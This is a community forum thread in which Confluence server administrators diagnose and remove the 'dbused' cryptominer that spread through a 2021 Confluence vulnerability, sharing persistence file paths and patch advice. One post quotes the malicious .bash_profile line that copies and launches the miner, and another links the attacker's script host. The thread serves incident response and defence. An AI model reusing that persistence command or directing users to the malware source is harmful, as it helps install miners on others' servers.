No access to Conlfuence Webpage, 100% CPU usage from "dbused"

Thank you @Alex Rangeo , followed the above steps and Confluence has returned! Will be updating to LTS at the earliest opportunity.

i was infected as well; you can read the "/tmp/xms" source script here 

http://bash.givemexyz.in/xms 

and find out that its better to check all these files and folders

/etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down 

 in my case i found crontab job inside `/var/spool/cron/crontabs/confluence2` file like Alex said

I also found `/var/spool/cron/crontabs/confluence`

The same isssue wwith Alex, it's come from everywhere. Is there any idea ?

Thank you very much! It was indeed a miner. I think I could get rid of it.

Best regards

Dennis

Hello @TUHH-DKA , i followed Alex steps, but it's still not fixed yet, can you provide some step.

The coinminer is automatic generate in /root/c3pool

Could this be the source https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html?

Hey Alex, thanks. I did both of these, yet to no result. The cron file (and the result process) regenerates every minute.

I had the same issue where 'dbused' process consumed massive CPU except mine wasn't launched via crontab, this was injected into my 'confluence' user's .bash_profile:

cp -f -r -- /tmp/.pwn/bprofr /tmp/dbused 2>/dev/null && /tmp/dbused -c  >/dev/null 2>&1 && rm -rf -- /tmp/dbused 2>/dev/null

everytime 'confluence' user logged in the 'dbused' process launched then removed itself from filesystem

De los archivos del /tmp cuales reconocen como maliciosos?

I compared to another confluence instance, and the only folder there was: hsperfdata_confluence/

All other files owned by the confluence user were suspicious.

Without warranty, of course.

Yeah, the confluence ownership is a giveaway, as the confluence user wouldn't have much of a reason to create the files there.

Ran into this issue as well today for the first time.

On Confluence restart attempt, logs reveal:

OpenJDK 64-Bit Server VM warning: INFO: os::commit_memory(0x00000000f6500000, 32505856, 0) failed; error='Cannot allocate memory' (errno=12)
#
# There is insufficient memory for the Java Runtime Environment to continue.
# Native memory allocation (mmap) failed to map 32505856 bytes for committing reserved memory.
# An error report file with more information is saved as:
# /tmp/hs_err_pid23285.log

 free -m command shows memory dwindling slowly until approx 40MB available, then "resets" and begins the drain again.

We are running Confluence and Jira on AWS instances and truly do not want to move up to next size of instance type just to accommodate. I have tried making the recommended changes in the /tmp/hs_err_pid23285.log file with no success.

I have opened a support ticket with Atlassian in the meantime

I have this issue as well starting at midnight on 1 Sept 2021 - bumping up my instance from 4g - but I was running fine on 70% ram utilization in the past

actually it is kworker (crypto) - I left 0.0.0.0/0 open - locking down the security group firewall

i have the same problem on differents machine with confluence on AWS, all these machine has a CPU consume 100% o more

Hi Michael

Are you saying that you applied the "atlassian workaround", but still got infected?

Thanks

Curious James

maybe leftover cron or startup command?

Thanks

Yes, I formally applied the workaround script in the CVE notice - totally fine for 2 weeks (before that in 1-6h the miner would restart).  To be honest I was extremely busy with multiple contracts and right when I was to refer to one of my wiki pages - the site went down on the 1st.  normally I would triage and mitigate - the workaround script worked well for 2 weeks.  Good thing it has restarted my side project to have a static generated site using S3/lambda/api-gateway serverless.  I also have the Atlassian confluence as a service but I like my own server/templates better.  Anyway I purchased every license I could a couple months ago before the standalone license was deprecated.  I used one of those licenses to keep my server going another year and updated from 6 to 7 - so far after a week I am good.

so yes, the workaround is not sufficient - it did not fully mitigate (either left the script or allowed for reinfection) - you MUST upgrade to 7

It patches the vulnerability in confluence so you won't get new malware, but can't really solve the malware for you.. our confluence is still fine 24 days later. They could have included more details on what kind of malware has used the breach and where to look, but that already goes into normal server management.. which, if you are using the on-premise version, should know how to handle yourself.

https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/
this has helped get some pointers on where to look

oh yes. this patch https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html did it for me.

https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

@Kamil Beer de los archivos que encontro en  el /tmp cuales fueron sospechosos o que prefijo tenian?

Gracias 

@Daniel Stiven Ballen Garcia, check how old they are, perhaps using "ls -lah". Most of the suspicious files were made on September 1st or 2nd (or whenever did this problem occur to you).

try reboot the server, then quickly remove it

/var/spool/cron/confluence

/tmp/dbused

/tmp/.pwn

check the location as above comment: 

etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down 

upgrade the server to LTS version will help resolve it.

@Trung Vu, yeah. The cronfile, for me, generated in /var/spool/cron, with the confoluence user. Anyway, it seems I resolved it using the workaround, but will update to LTS soon anyway.